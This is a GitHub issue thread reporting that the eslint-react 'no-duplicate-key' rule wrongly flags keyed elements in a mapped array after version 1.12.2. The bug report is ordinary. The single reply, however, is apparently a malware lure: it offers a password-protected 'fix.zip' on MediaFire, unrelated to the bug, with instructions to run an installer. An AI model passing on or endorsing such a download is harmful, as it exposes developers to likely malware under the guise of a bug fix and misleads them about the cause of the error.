### ISSUE TITLE
[bug] `no-duplicate-key` rule causes an error in any Iterator element.

### ISSUE THREAD

**Issue by Xatloon** [Rel1cx/eslint-react#746]
### Describe the bug

<img width="715" alt="image" src="https://github.com/user-attachments/assets/5d14219e-d76e-44e1-b1c9-2446a7e6327c">

### Reproduction

Any iterator element like:

```typescript
const foo = [
  {
    name: 'name1',
    value: 'value1',
  },
  {
    name: 'name2',
    value: 'value2',
  },
]

foo.map(item => (
  <div key={item.name}> <------ throw error: A key must be unique. '{item.name}' is duplicated.
    {item.name + item.value}
  </div>
))
```

### Expected behavior

do not throw this error

### Platform and versions

```Text
Node.js: v20.17.0
@eslint-react/react-plugin: 1.12.2
```

### Additional context

It might be related to 6f93422. 
I tried downgrading to version 1.12.1, and I didn’t encounter this error again.

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
